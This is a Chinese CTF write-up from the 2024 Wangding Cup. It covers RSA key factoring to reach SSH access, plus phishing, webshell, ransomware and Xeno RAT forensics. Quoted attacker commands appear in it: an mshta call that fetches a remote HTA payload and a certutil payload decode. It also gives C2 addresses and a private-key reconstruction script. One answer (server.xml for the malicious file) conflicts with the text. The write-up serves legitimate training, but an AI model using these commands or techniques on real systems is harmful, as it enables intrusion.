2024第四届“网鼎杯”网络安全大赛|玄武组Writeup

一年一度的网络安全奥运会又来了!!!

背景

11月4日,第四届“网鼎杯”网络安全大赛第四场线上官方资格赛——“玄武之竞”完美收官。来自科研机构、科技企业、网安企业、互联网企业、测评机构以及社会参赛队伍数千名参赛选手,鏖战8小时,争夺最后的半决赛入场券。

Web

Web03

dirsearch扫出来robots.txt,访问之后可以看到如下内容。

/images/1731029458178.png

很明显wbStego4.bmp使用了wbStego4隐写,空密码解密即可。

![](/images/1731029589618.png /images/1731029615356.png

发现是SSH的公钥格式

/images/1731029653082.png

转换为PKCS8格式

1
sudo ssh-keygen -f id_rsa.pub -e -m PKCS8

可以得到

1
2
3
4
5
6
7
8
9
-----BEGIN PUBLIC KEY-----
MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQB6kiEmH5MLhXl9tCk7cg4a
Rv55sjCuTK5oyiC1Gy8aRLYMPuItLCEeLFrTaRklQDC2eGDvBGOqexQcNM+LtAC6
NqgvCO+t5XypTVx9Vh1nsUR3e9jBKcaTs7e/bpGmxK+zlqUXQxCEo9zMhGpVTWBk
yjLf00Fkf3ZxXfk7AwdmkQwUEKvVX0IWfWfOuIbkOA7vDyoONqZc30TybBIXuCaR
NBluUEWqfWTRzP+H0khyZcKmwahnXiI8PlO82P0aJMSve/fn+0jeqjHPRcwFE528
BRi6WXuKIc+KTyTa5kSnxEU0ig6F8NZK3Q2bhGcwoIqa6UfFqi7xqA14WLLXK4Fl
AgMBAAE=
-----END PUBLIC KEY-----

找一个在线网站解析公钥https://bkssl.com/ssl/parser/publicKey

/images/1731029796620.png

1
2
3
4
5
6
7
8
9
In [3]: 0x7a9221261f930b85797db4293b720e1a46fe79b230ae4cae68ca20b51b2f1a44b60c3e
   ...: e22d2c211e2c5ad36919254030b67860ef0463aa7b141c34cf8bb400ba36a82f08efade5
   ...: 7ca94d5c7d561d67b144777bd8c129c693b3b7bf6e91a6c4afb396a517431084a3dccc84
   ...: 6a554d6064ca32dfd341647f76715df93b030766910c1410abd55f42167d67ceb886e438
   ...: 0eef0f2a0e36a65cdf44f26c1217b8269134196e5045aa7d64d1ccff87d2487265c2a6c1
   ...: a8675e223c3e53bcd8fd1a24c4af7bf7e7fb48deaa31cf45cc05139dbc0518ba597b8a21
   ...: cf8a4f24dae644a7c445348a0e85f0d64add0d9b846730a08a9ae947c5aa2ef1a80d7858
   ...: b2d72b8165
Out[3]: 15473132342055954558780743503377112628799304584198645895267270016124133490922098456166112042641326832865833651985277530457678074443980433108579830298962133947433527712865590585431566632983430843501946695655887372383479716038917317269141215074859439934216381040714018271595168426357226026198765176618021081022415221237337044775954393916497106899407589200453955923849063288526403725531781699959251467756397025462984686365248488495366710314704482655593149707807258497477652225445069994376526985310824804739194259812224359792816573562797784525943054303945261131087499235482603191504292886444952159639040155783760580411749

尝试yafu分解N,可以得到pq

1
yafu-x64.exe factor(15473132342055954558780743503377112628799304584198645895267270016124133490922098456166112042641326832865833651985277530457678074443980433108579830298962133947433527712865590585431566632983430843501946695655887372383479716038917317269141215074859439934216381040714018271595168426357226026198765176618021081022415221237337044775954393916497106899407589200453955923849063288526403725531781699959251467756397025462984686365248488495366710314704482655593149707807258497477652225445069994376526985310824804739194259812224359792816573562797784525943054303945261131087499235482603191504292886444952159639040155783760580411749)

/images/1731029941808.png

再生成私钥登陆靶机即可

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# -*- coding: utf-8 -*-

from Crypto.PublicKey import RSA

def generate_rsa_keypair(p, q, e=65537):
    """
    生成RSA密钥对。

    :param p: 大素数p
    :param q: 大素数q
    :param e: 公钥指数,默认为65537
    :return: RSA私钥
    """
    # 计算模数N
    N = p * q
    # 计算欧拉函数phi(N)
    phi = (p - 1) * (q - 1)
    # 计算私钥d
    d = pow(e, -1, phi)
    # 构造RSA私钥
    pri_key = RSA.construct((N, e, d))
    return pri_key

def save_private_key_to_file(private_key, filename="id_rsa"):
    """
    将私钥保存到文件中。

    :param private_key: RSA私钥对象
    :param filename: 保存的文件名,默认为"id_rsa"
    """
    with open(filename, "wb") as f:
        f.write(private_key.export_key("PEM"))

# 示例:生成RSA密钥对并保存私钥
if __name__ == "__main__":
    # 输入大素数p和q
    p = 124391046068661849479368048442368264528688137061859889420748135089530711531982879099228365579453507914971808645098707899792342947071605270753221189146520461936329644320307671256282476976106892669621936765657513838321041373894048138250076354093023213535042038834560618477692450327056145702068970492978556584563
    q = 124391046068661849479368048442368264528688137061859889420748135089530711531982879099228365579453507914971808645098707899792342947071605270753221189146520461936329644320307671256282476976106892669621936765657513838321041373894048138250076354093023213535042038834560618477692450327056145702068970492978556583623

    private_key = generate_rsa_keypair(p, q)
    save_private_key_to_file(private_key)
    print(f"私钥已保存到文件:id_rsa")

/images/1731030149119.png

Misc

MISC01

应急响应十连问😭😭😭 给了两个附件,一个pcappng流量包,一个Foxmail和Windows主机目录压缩包。

/images/1731030669633.png /images/1731030728125.png

(1/10) 攻击者拿到了其被感染应用的管理员账户 你能知道其管理员账户的信息是什么吗? 格式:用户名:密码 示例:aaaa:bbbb 熟悉tomcat的师傅应该都可以很快找到

1
/Challenge/Users/Wang/Downloads/apache-tomcat-10.1.25-windows-x64/apache-tomcat-10.1.25/conf/tomcat-users.xml

/images/1731030478529.png

答案是admin:admin

(2/10) 攻击者利用什么文件来成功感染应用 请提供其的完整路径 格式:C:/xxxss/ssssa/xxxx/cccs/ssss.xxxx 示例:C:/users/Appdat/123/xx.txt 在tomcat的conf目录下可以看到攻击者上传的恶意host.war包

/images/1731030882902.png

答案是:

1
C:/Users/Wang/Downloads/apache-tomcat-10.1.25-windows-x64/apache-tomcat-10.1.25/conf/server.xml

(3/10) 攻击者所使用webshell中的加密算法是什么? 用_分割即可 有两个 请注意编码不属于加密 格式:加密算法1_加密算法2 示例:DES_RSA 在control.jsp里面可以看到XOR和AES,和强网杯一样。

/images/1731031090902.png

答案是XOR_AES

(4/10) 从上一问所提及的两种算法其秘钥分别是多少? 用_分割即可 格式:KEY1_KEY2 示例:aaaaa_bbbbbb 密钥如上图所示,答案是121b8df8c86ca5b4_2ed2bf6465e2ddc4

(5/10) 攻击者使用webshell删除了什么文件 示例:MD5(C:/users/Appdata/123/xx.txt) 以cyberchef结果为准 追踪TCP流38

/images/1731031493314.png

再使用XOR->AES解密流量

/images/1731031556896.png /images/1731031582971.png

可以看到删除了install_guide.pdf.lnk文件。

1
C:/Users/Wang/AppData/Roaming/Foxmail7/Temp-2516-20240629121132/Attach/install_guide.pdf.lnk

再算一下md5,答案是233f926656cb3c3c81a2db426514c0f2

(6/10) 攻击者通过webshell上传了什么文件 你能知道其文件名吗? 示例:xxxx.txt 追踪TCP流59,再跑XOR->AES脚本解密流量,可以得到class文件,再反编译得到java文件

/images/1731031766329.png

答案是downloadCache

(7/10) 攻击者在文件上传后执行了什么命令 你可以给出完整的命令行吗? 示例:MD5(cmd.exe /c echo xxxx) 以cyberchef结果为准 追踪TCP流50,再跑XOR->AES脚本解密流量,可以得到class文件,再反编译得到java文件

/images/1731031843236.png /images/1731031880546.png

答案是certutil.exe -decode .\downloadCache .\ht-view.exe

(8/10) 攻击者所上传的文件其会加密什么后缀的文件 用_分割 后缀名都带.,若有多种后缀则按照字母序排列 示例:.exe_.dll 从最后一个TCP流往前翻,找到8个分块传输的数据,序号也给了,拼在一起解。(这个真的考验耐心和毅力😭)

/images/1731032008574.png

再base64解码可以得到一个hw-view.exe

/images/1731032039508.png

发现是.NET写的exe,于是用dnSpy反编译。

/images/1731032082265.png

在加密算法中看到了加密文件的后缀名,按照字母序排列好。 答案是:

1
.asp_.aspx_.csv_.doc_.docx_.html_.jpg_.mdb_.odt_.php_.png_.ppt_.pptx_.psd_.sln_.sql_.txt_.xls_.xlsx_.xml

(9/10) 攻击者所上传的文件有无外联行为 如果有他请求的URL是什么? 示例:http://baidu.com 注意:以流量信息为准 追踪TCP流60,可以看到外连的地址信息,是一个内网地址。

/images/1731032161401.png

答案是

1
http://172.25.136.161:8100/?info=UbuntuWIN-E2J7QKKEBJ6-Wang%206k?TKl/Mu9?uFyia12cc

(10/10) 机密文件被加密了 你可以拿到其解密内容吗 示例:MD5(flag{test}) 以cyberchef结果为准 分析hw-view.exe程序的加密算法,写出对应的解密,还原secret.txt.locked文件的内容。

/images/1731032539339.png /images/1731032680043.png

答案是flag{Y0u_4re_MASTER_0f_DFIR}

MISC02

(1/10) 系统被通过什么方式植入了恶意软件,该种方式对应ATT&CK的TTPs号是什么? 示例:T001 直接问GPT,可以发现是钓鱼是T1566

/images/1731033116733.jpg

答案是T1566

(2/10) 攻击者所使用了的钓鱼载荷后缀名是什么? 以及其的SID号是什么? 两个题目的答案请使用_连接 示例:exe_776645432432 既然是钓鱼,还给了foxmail,大概率是邮件钓鱼。打开附件中的foxmail.exe,能看到两封邮件,最新的一封邮件就是钓鱼邮件。

/images/1731033311526.png

可以看到邮件中有一个lnk文件,保存之后查看该文件的属性信息。

/images/1731033381549.png

该文件目标是mshta.exe http://172.25.136.161:8000/install.hta 再使用十六进制编辑器查看该文件,可以得到SID。

/images/1731033487599.png

答案是lnk_S-1-5-21-2014616596-768976026-1254046286-1001

(3/10) 其钓鱼载荷执行的命令是什么 示例:cmd.exe /c powershell(注意:按照示例的写不用写全路径) 提交上一问lnk文件中的目标指向。 答案是mshta.exe http://172.25.136.161:8000/install.hta

(4/10) 其命令所请求的缓存文件夹是什么 示例: C:/Users/xxx/xxx/xxxx 在目录中全局搜索.hta文件,可以得到文件夹路径。 答案是

1
C:/Users/Wang/AppData/Local/Microsoft/Windows/Temporary Internet Files/Content.IE5/UFFAFLNS

(5/10) 攻击者使用了何种RAT? 示例:asyncrat 打开该install[1].hta文件,可以看到下载了Flycode_VPN_installer.exe文件。

/images/1731046344408.png

在目录Temp中可以找到该VPN程序,使用dnSpy反编译,再解密里面的base64编码。

/images/1731034791670.png

base64解码之后可以得到xeno rat client.exe,使用dnSpy反编译,能看到RAT框架的名称。 答案是xenorat

(6/10) 木马使用了何种加密算法加密数据? 示例:DES 根据exe反编译出来的加密算法,答案是AES

(7/10) 木马所连接的IP和端口是什么? 示例:192.168.345.21:7000 直接把exe扔在线沙箱,发现没有反沙箱功能,可以直接跑出网络行为。

/images/1731034406891.jpg

答案是172.25.136.161:10004

(8/10) 木马所控制机器的硬件编号是什么 示例:00000BBBAAAAA 分析exe中的加密算法,发现存在混淆,使用de4dot反混淆,可以拿到请求的地址和Key,外连地址和上一问沙箱中跑出的结果一致。根据题目描述,被控机器信息应该是在流量中的返回包中,再结合AES加密算法来解密流量。 在追踪TCP流量的过程中,发现存在类似于命令执行和返回结果的通信数据包。

/images/1731035416823.png

再看看hex格式

/images/1731035475474.png

在互联网检索xenorat关键字,找到一篇文章Xeno-RAT通信模型剖析及自动化解密脚本实现 发现题目中的通信数据和这篇文章中的数据出奇的一致,根据加密算法,写出解密流量的脚本。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# -*- coding: utf-8 -*-
# @Author: 1cePeak

from Crypto.Cipher import AES

# 解密函数
def decrypt_string(enc_str):
    try:
        # 使用 AES CBC 模式进行解密
        cipher = AES.new(KEY, AES.MODE_CBC, IV)
        decrypted = cipher.decrypt(bytes.fromhex(enc_str))
        # 解密后的数据尝试转为 utf-8 字符串(遇到无法解码的字符时忽略)
        return decrypted.decode('utf-8', 'ignore')
    except Exception as e:
        return f"解密失败: {e}"

# 加密数据字符串
xenorat_data = '''
7100000000e9ba158fdff498979e080818eb73f5a2f5a850d5beb8c77e0791d880146f98ae27b47023d656df40bfdbb9996f9cb3d7fd74140bfef2e71275a24510acf1439df35efeb32502a62206e4688de70ef5a4e74c3b3e0c6bb550e38b0b5deb9b5e3281a7f7e65efe8652d13882bb619f0f78
71000000032bc8b1334e21da17bb95ec4e03d6b0c2d776daa95ae5e8dff288ca63b543d574fc9db7438b514bac4333f6a20f1f8da3bf16935b7deeae12c1e075e0da147adc148a33838f9d35ad4ecff03f09d0dcf00b01a0163be283f2863442503a6a23b251dc2bc6aa660db012002596c530ab76
11000000039fbb23d18d68972f0ae6de8219190cb0
1100000003b2d10af5854b91e2e764c986d1d64c18
110000000323145f9a56536a180c113c5e21812c40
11000000033bac521ae26859766243c036301f87c4
7100000003bc4faceefa1dc31d452b7348201f65481831c0d0c7512eb13e5e1d258e8583b959e3239dd9f2f495ee0b384e24453898eb1b1b73003ac5c6d662940cb92bfcbabbaa4eed9ab68e13d118128053495cbbb6b42bdf31f01d3eb36b12f7ce110e5e092b082fd9c551834f26174faa1b16ad
1100000003b92d5ac86208df769ece4abece0dc85f
11000000033bac521ae26859766243c036301f87c4
1100000003443a21e5c8a2bd68f64c38fa8288c44e
11000000033bac521ae26859766243c036301f87c4
11000000039bf3dceb80c7afbf98b3fa6566946bc5
11000000033bac521ae26859766243c036301f87c4
1100000003701efb644c3b550da6bc247b9e24fdac
11000000033bac521ae26859766243c036301f87c4
1100000003dd028d3eccfef7f6c0309077231c9fef
11000000033bac521ae26859766243c036301f87c4
1100000003e51f135650bcc65d29a8a527060eba8e
11000000033bac521ae26859766243c036301f87c4
1100000003fd69bdf4fe39a5c4133934c0401cbaa3
11000000033bac521ae26859766243c036301f87c4
11000000038977745e6e9182fb6a98bc7bb9411bdb
11000000033bac521ae26859766243c036301f87c4
1100000003eb7945413202a5ebf309e7767ccc90cd
11000000033bac521ae26859766243c036301f87c4
1100000003537edcc15a967af5f52547b8566fb61c
11000000033bac521ae26859766243c036301f87c4
110000000343490cb3331c98647416fefe2a5aa789
'''

# AES 密钥和初始化向量(IV)
KEY = bytes.fromhex('85aaa9cc1dc1043104935f4a658d6091940c45127da6398e885231908c0f5d1d')
IV = bytes(16)  # 使用零字节初始化 IV

# 处理每一行加密数据
for line in xenorat_data.split():
    # 去掉每行两端的空格,并跳过空行
    clean_line = line.strip()
    if clean_line:
        # 解密并打印结果
        result = decrypt_string(clean_line[10:])  # 跳过前10个字符
        print(result)

/images/1731036489261.png

可以看到返回包中存在被控机器的硬件编号,答案是F757C4A862675D1A5A5A

(9/10) 攻击者对被感染机器的某些正常应用进行了进一步的可持续化维持,请找到被利用的应用 示例:phpstudy 12.0 根据前几问的分析,被感染的Web应用是tomcat,找到目录中tomcat的路径,可以看到具体版本号。

1
/Challenge/Users/Wang/Downloads/apache-tomcat-10.1.25-windows-x64/apache-tomcat-10.1.25/webapps/host.war

答案是apache tomcat 10.1.25

(10/10) 攻击者部署webshell所使用的文件是什么 示例:shell.php 根据前几问的分析,答案是host.war

为了体验一键获取flag的快感,写一个自动提交脚本爽一下。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# -*- coding: utf-8 -*-
# @Author  : 1cePeak

import json
from pwn import *
re = remote('xxx.dg08.ciihw.cn', 114514)

flag1=b'admin:admin'
flag2=b'C:/Users/Wang/Downloads/apache-tomcat-10.1.25-windows-x64/apache-tomcat-10.1.25/conf/server.xml'
flag3=b'XOR_AES'
flag4=b'121b8df8c86ca5b4_2ed2bf6465e2ddc4'
flag5=b'233f926656cb3c3c81a2db426514c0f2'
flag6=b'downloadCache'
flag7=b'516990ac9782dfac0168d453dd056779'
flag8=b'.asp_.aspx_.csv_.doc_.docx_.html_.jpg_.mdb_.odt_.php_.png_.ppt_.pptx_.psd_.sln_.sql_.txt_.xls_.xlsx_.xml'
flag9=b'http://172.25.136.161:8100/?info=UbuntuWIN-E2J7QKKEBJ6-Wang%206k?TKl/Mu9?uFyia12cc'
flag10=b'2db6b20f6b16c2563d037f3f98e0f1ab'

resp=re.recvuntil('请输入你的答案 >')
re.sendline(flag1)
print(resp.decode('utf8'))

resp=re.recvuntil('请输入你的答案 >')
re.sendline(flag2)
print(resp.decode('utf8'))

resp=re.recvuntil('请输入你的答案 >')
re.sendline(flag3)
print(resp.decode('utf8'))

resp=re.recvuntil('请输入你的答案 >')
re.sendline(flag4)
print(resp.decode('utf8'))

resp=re.recvuntil('请输入你的答案 >')
re.sendline(flag5)
print(resp.decode('utf8'))

resp=re.recvuntil('请输入你的答案 >')
re.sendline(flag6)
print(resp.decode('utf8'))

resp=re.recvuntil('请输入你的答案 >')
re.sendline(flag7)
print(resp.decode('utf8'))

resp=re.recvuntil('请输入你的答案 >')
re.sendline(flag8)
print(resp.decode('utf8'))

resp=re.recvuntil('请输入你的答案 >')
re.sendline(flag9)
print(resp.decode('utf8'))

resp=re.recvuntil('请输入你的答案 >')
re.sendline(flag10)
print(resp.decode('utf8'))
re.interactive()

恭喜你坐牢结束,这是奖励你的flag 🚩 –> wdflag{See_U_Again_WDB2026}

0%